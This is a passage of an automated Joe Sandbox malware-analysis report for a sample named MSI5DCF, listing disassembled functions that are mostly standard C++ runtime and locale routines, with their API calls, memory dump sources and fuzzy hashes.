                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection$EnterLeave$AddressConditionCurrentHandleModuleProcProcessVariableWake
                                                                        • String ID: IsWow64Process$kernel32
                                                                        • API String ID: 2056477612-3789238822
                                                                        • Opcode ID: 17cdce98fdb36a2611246dc84d20e934b6186beee1d4bef6f047d633cced7270
                                                                        • Instruction ID: dc9d3a901629f3c60a8012e031592574cded02a82ebb37b078f3156ab7e4f890
                                                                        • Opcode Fuzzy Hash: 17cdce98fdb36a2611246dc84d20e934b6186beee1d4bef6f047d633cced7270
                                                                        • Instruction Fuzzy Hash: A21175B5D44715EFCB20DF94ED05BAD77A8FB08720F20465AE91593390DF756900CA90
                                                                        Function 00B08461 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,B7207CF4,?,?,00000000,00B1CBE4,000000FF,?,00B083F1,?,?,00B083C5,?), ref: 00B08496
                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B084A8
                                                                        • FreeLibrary.KERNEL32(00000000,?,00000000,00B1CBE4,000000FF,?,00B083F1,?,?,00B083C5,?), ref: 00B084CA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                        • API String ID: 4061214504-1276376045
                                                                        • Opcode ID: b0900e5aded69f830ae0cde292db69788dbb1f998447c15e27959acbb1bc4b80
                                                                        • Instruction ID: b923aa4938d5c8d03ad039e842627d21703dd7735061d0efaee72bd1056da2df
                                                                        • Opcode Fuzzy Hash: b0900e5aded69f830ae0cde292db69788dbb1f998447c15e27959acbb1bc4b80
                                                                        • Instruction Fuzzy Hash: 5A016231944629BFDB119F54DC45BEEBBF9FB04B15F008565E811E36E0DF789900CA90
                                                                        Function 00AEDDD2 Relevance: 7.9, APIs: 5, Instructions: 433COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AEDDD9
                                                                        • collate.LIBCPMT ref: 00AEDF54
                                                                        • numpunct.LIBCPMT ref: 00AEE1CE
                                                                          • Part of subcall function 00AE83C2: __EH_prolog3.LIBCMT ref: 00AE83C9
                                                                          • Part of subcall function 00AE815A: __EH_prolog3.LIBCMT ref: 00AE8161
                                                                          • Part of subcall function 00AE815A: std::_Lockit::_Lockit.LIBCPMT ref: 00AE816B
                                                                          • Part of subcall function 00AE815A: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE81DC
                                                                          • Part of subcall function 00ADEAF0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADEB1D
                                                                          • Part of subcall function 00ADEAF0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADEB40
                                                                          • Part of subcall function 00ADEAF0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADEB68
                                                                          • Part of subcall function 00ADEAF0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADEC07
                                                                          • Part of subcall function 00AE4403: Concurrency::cancel_current_task.LIBCPMT ref: 00AE44C6
                                                                          • Part of subcall function 00AE764B: __EH_prolog3.LIBCMT ref: 00AE7652
                                                                          • Part of subcall function 00AE764B: std::_Lockit::_Lockit.LIBCPMT ref: 00AE765C
                                                                          • Part of subcall function 00AE764B: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE76CD
                                                                        • __Getcoll.LIBCPMT ref: 00AEDF94
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                          • Part of subcall function 00AD84C0: LocalAlloc.KERNEL32(00000040,00000000,00AF839D,00000000,B7207CF4,?,00000000,?,00000000,?,00B1CB8D,000000FF,?,00AD17D5,00000000,00B1D3BA), ref: 00AD84C6
                                                                          • Part of subcall function 00ADB9E0: __Getctype.LIBCPMT ref: 00ADB9EB
                                                                          • Part of subcall function 00AE7A5E: __EH_prolog3.LIBCMT ref: 00AE7A65
                                                                          • Part of subcall function 00AE7A5E: std::_Lockit::_Lockit.LIBCPMT ref: 00AE7A6F
                                                                          • Part of subcall function 00AE7A5E: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7AE0
                                                                          • Part of subcall function 00AE7B88: __EH_prolog3.LIBCMT ref: 00AE7B8F
                                                                          • Part of subcall function 00AE7B88: std::_Lockit::_Lockit.LIBCPMT ref: 00AE7B99
                                                                          • Part of subcall function 00AE7B88: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7C0A
                                                                          • Part of subcall function 00AE7DDC: __EH_prolog3.LIBCMT ref: 00AE7DE3
                                                                          • Part of subcall function 00AE7DDC: std::_Lockit::_Lockit.LIBCPMT ref: 00AE7DED
                                                                          • Part of subcall function 00AE7DDC: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7E5E
                                                                          • Part of subcall function 00AE7D47: __EH_prolog3.LIBCMT ref: 00AE7D4E
                                                                          • Part of subcall function 00AE7D47: std::_Lockit::_Lockit.LIBCPMT ref: 00AE7D58
                                                                          • Part of subcall function 00AE7D47: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7DC9
                                                                          • Part of subcall function 00AE4403: __EH_prolog3.LIBCMT ref: 00AE440A
                                                                          • Part of subcall function 00AE4403: std::_Lockit::_Lockit.LIBCPMT ref: 00AE4414
                                                                          • Part of subcall function 00AE4403: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE44BB
                                                                        • codecvt.LIBCPMT ref: 00AEE27F
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3$AllocConcurrency::cancel_current_taskGetcollGetctypeLocalcodecvtcollatenumpunct
                                                                        • String ID:
                                                                        • API String ID: 2252558201-0
                                                                        • Opcode ID: efd4a87e10dd02aaf20020f88f35aa83d6b6ce2f213cffff84c5877377336201
                                                                        • Instruction ID: 5fd2154664fe5c999b9095e4ee44ecbb698b42a37b5983e665d7c6638b59d983
                                                                        • Opcode Fuzzy Hash: efd4a87e10dd02aaf20020f88f35aa83d6b6ce2f213cffff84c5877377336201
                                                                        • Instruction Fuzzy Hash: ADE104B190029AAFDB21AF668D026BF7EB9FF55350F15452EF9196B381EF308C108791
                                                                        Function 00B0C382 Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __alloca_probe_16.LIBCMT ref: 00B0C409
                                                                        • __alloca_probe_16.LIBCMT ref: 00B0C4CA
                                                                        • __freea.LIBCMT ref: 00B0C531
                                                                          • Part of subcall function 00B0B127: HeapAlloc.KERNEL32(00000000,?,?,?,00B0AAAA,?,00000000,?,00AFC282,?,?,?,?,?,?,00AD1668), ref: 00B0B159
                                                                        • __freea.LIBCMT ref: 00B0C546
                                                                        • __freea.LIBCMT ref: 00B0C556
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                        • String ID:
                                                                        • API String ID: 1096550386-0
                                                                        • Opcode ID: 7f411535b509cc5248705a7b023e1946c31583475cb3fbef0449ff941141c610
                                                                        • Instruction ID: ed619ab069786dced9a42cde596bf56e9f5862dcc97f304c67d8368056e95913
                                                                        • Opcode Fuzzy Hash: 7f411535b509cc5248705a7b023e1946c31583475cb3fbef0449ff941141c610
                                                                        • Instruction Fuzzy Hash: FE51A572600116AFEF215F64DC92EBF7EE9EF54354B1542A8FD08D6291EB31ED1087A0
                                                                        Function 00ADC590 Relevance: 7.6, APIs: 5, Instructions: 116COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00ADC5BD
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00ADC5E0
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC608
                                                                        • std::_Facet_Register.LIBCPMT ref: 00ADC67D
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC6A7
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                        • String ID:
                                                                        • API String ID: 459529453-0
                                                                        • Opcode ID: 21053eca8456f067447b7d3c144c1c86df213edd1c2c662266b95fa7f8d381d0
                                                                        • Instruction ID: b6b43425285161a123cda45b8ac6e3854b86d96597af28eb3e94b029a8674d53
                                                                        • Opcode Fuzzy Hash: 21053eca8456f067447b7d3c144c1c86df213edd1c2c662266b95fa7f8d381d0
                                                                        • Instruction Fuzzy Hash: 3141A071C0069ADFCB11DF68D940BAEBBF4EF04724F68425AE815A7391DB34AE04CB91
                                                                        Function 00ADEAF0 Relevance: 7.6, APIs: 5, Instructions: 109COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00ADEB1D
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00ADEB40
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADEB68
                                                                        • std::_Facet_Register.LIBCPMT ref: 00ADEBDD
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADEC07
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                        • String ID:
                                                                        • API String ID: 459529453-0
                                                                        • Opcode ID: 77b70e9a0c3203aefd1d2a4042b168198eb18478afa6ba830b9f764e1a7bb43f
                                                                        • Instruction ID: b6fd1e522263b253699fd268997af69a8553190d5e7f9cb54fc61a0d9c997b90
                                                                        • Opcode Fuzzy Hash: 77b70e9a0c3203aefd1d2a4042b168198eb18478afa6ba830b9f764e1a7bb43f
                                                                        • Instruction Fuzzy Hash: 2C41A071900659DFCB11DF58D944B9EBBB4FB04724F24869AE816AB391DB30BE04CB91
                                                                        Function 00ADEC30 Relevance: 7.6, APIs: 5, Instructions: 109COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00ADEC5D
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00ADEC80
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADECA8
                                                                        • std::_Facet_Register.LIBCPMT ref: 00ADED1D
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADED47
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                        • String ID:
                                                                        • API String ID: 459529453-0
                                                                        • Opcode ID: 4f19e5a7788a0db2f199469b4bd0bc91255314c6f107cc359329bc0ae13cbc09
                                                                        • Instruction ID: 809204f858380c9973eed6b582fa8378ba3a5cf763ce1f4484a28b5528a74316
                                                                        • Opcode Fuzzy Hash: 4f19e5a7788a0db2f199469b4bd0bc91255314c6f107cc359329bc0ae13cbc09
                                                                        • Instruction Fuzzy Hash: E6410571C10659DFCB11DF68D940BAEBBB4FB04724F24465AE812AB391DB31AE04CBD1
                                                                        Function 00ADED70 Relevance: 7.6, APIs: 5, Instructions: 109COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00ADED9D
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00ADEDC0
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADEDE8
                                                                        • std::_Facet_Register.LIBCPMT ref: 00ADEE5D
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADEE87
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                        • String ID:
                                                                        • API String ID: 459529453-0
                                                                        • Opcode ID: fbd5943c211e6207eca11c4bc1eb149b9644de645a79da74f389d523c65efefd
                                                                        • Instruction ID: 42c78a3bec7d068d21c75fdc9f84205800fc6c580714135778b9ef9a11c9fb8e
                                                                        • Opcode Fuzzy Hash: fbd5943c211e6207eca11c4bc1eb149b9644de645a79da74f389d523c65efefd
                                                                        • Instruction Fuzzy Hash: 0941D571D00255EFCB11DF68D9407AEBBB4FB04724F24465AE816AB391DB30AE44CBD1
                                                                        Function 00AD7C30 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 83COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLastError.KERNEL32(00000010,00000010,?,00AD7912,?,?), ref: 00AD7C37
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast
                                                                        • String ID: Call to ShellExecuteEx() returned:$Last error=$false$true
                                                                        • API String ID: 1452528299-1782174991
                                                                        • Opcode ID: 21b6162489e24d823cee7a3cbc78f8b9a73683ca917ea0f7d20d3fbb2906608e
                                                                        • Instruction ID: da56529ca5c2e3bf90ddd8955a1b959dd703bf96a761d0e133af24dcd31e3b42
                                                                        • Opcode Fuzzy Hash: 21b6162489e24d823cee7a3cbc78f8b9a73683ca917ea0f7d20d3fbb2906608e
                                                                        • Instruction Fuzzy Hash: D4215C49A202628ACB741F3D8400739B3F0EF54755B6518AFECDAD7390FB698DC28390
                                                                        Function 00AE6FF9 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Maklocstr$Maklocchr
                                                                        • String ID:
                                                                        • API String ID: 2020259771-0
                                                                        • Opcode ID: 890f096140a1f05beea16bcfb3b4fe19f9cb967ad6cbeee2b4ab5c7f033becab
                                                                        • Instruction ID: ab2a3822b72862426a548575c776f510fb9bf9746cf84ed7c0a1bb2c706b6090
                                                                        • Opcode Fuzzy Hash: 890f096140a1f05beea16bcfb3b4fe19f9cb967ad6cbeee2b4ab5c7f033becab
                                                                        • Instruction Fuzzy Hash: 2C119EB1508784BBE720EBA69881F56B7ECFF08310F04051AF289CBA41D365FD5087A5
                                                                        Function 00AE2823 Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE282A
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE2834
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • numpunct.LIBCPMT ref: 00AE286E
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE2885
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE28A5
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                        • String ID:
                                                                        • API String ID: 743221004-0
                                                                        • Opcode ID: 3332173ce17caf2ca067647f1c4a9ee70fea71a9878aa1d0c9d430b896659e94
                                                                        • Instruction ID: b20ef12bf2e997f6c00d71cc787a608f25be14758f67edce4ff3873e966447ba
                                                                        • Opcode Fuzzy Hash: 3332173ce17caf2ca067647f1c4a9ee70fea71a9878aa1d0c9d430b896659e94
                                                                        • Instruction Fuzzy Hash: 0211E136D002998BCF08EB65DA516BE7BB9AF80710F680149E4116B391DF34AE01CB90
                                                                        Function 00AE8030 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE8037
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE8041
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • numpunct.LIBCPMT ref: 00AE807B
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE8092
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE80B2
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                        • String ID:
                                                                        • API String ID: 743221004-0
                                                                        • Opcode ID: b9f3958bd519cf676d3e3ce3134294e82981085162caee86eb3fe50306207e4c
                                                                        • Instruction ID: f56f89ac33395199e83c4e49f101e722dd9941ed85771d16e2bcc50b3ce3286e
                                                                        • Opcode Fuzzy Hash: b9f3958bd519cf676d3e3ce3134294e82981085162caee86eb3fe50306207e4c
                                                                        • Instruction Fuzzy Hash: 0F01F536D00659CBCF00EBA5DA456BE77B1AF84310F240149F4156B3D2DF38AE05CB90
                                                                        Function 00AE75B6 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE75BD
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE75C7
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • codecvt.LIBCPMT ref: 00AE7601
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE7618
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7638
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                        • String ID:
                                                                        • API String ID: 712880209-0
                                                                        • Opcode ID: af5cebcf5f7973079471dfc822fadbf8f8fa2dbf5fb43a510d7f30c76a3fd357
                                                                        • Instruction ID: fe9c4dc43a6249d0b4f0f7aab77cde8be10a71cd4b9f2c2a972356e143a6e19c
                                                                        • Opcode Fuzzy Hash: af5cebcf5f7973079471dfc822fadbf8f8fa2dbf5fb43a510d7f30c76a3fd357
                                                                        • Instruction Fuzzy Hash: 3101D2359046999BCB04EBB8DA056BE77B1BF84318F240109F4116B392DF34AE01DB90
                                                                        Function 00AE76E0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE76E7
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE76F1
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • collate.LIBCPMT ref: 00AE772B
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE7742
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7762
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                        • String ID:
                                                                        • API String ID: 1007100420-0
                                                                        • Opcode ID: 235bb918272d3a4fadfdb8a99db077e297f17c605219de1f4d4d7006454df60d
                                                                        • Instruction ID: 0e3f543060ffb33ef85dc5599e42133c378c9a19338a5cf8266aef317ab52558
                                                                        • Opcode Fuzzy Hash: 235bb918272d3a4fadfdb8a99db077e297f17c605219de1f4d4d7006454df60d
                                                                        • Instruction Fuzzy Hash: BB01DE36D44659DBCB00EBA4EA46ABE77B1AF84310F240509F4216B392DF34AE02CB90
                                                                        Function 00AE2664 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE266B
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE2675
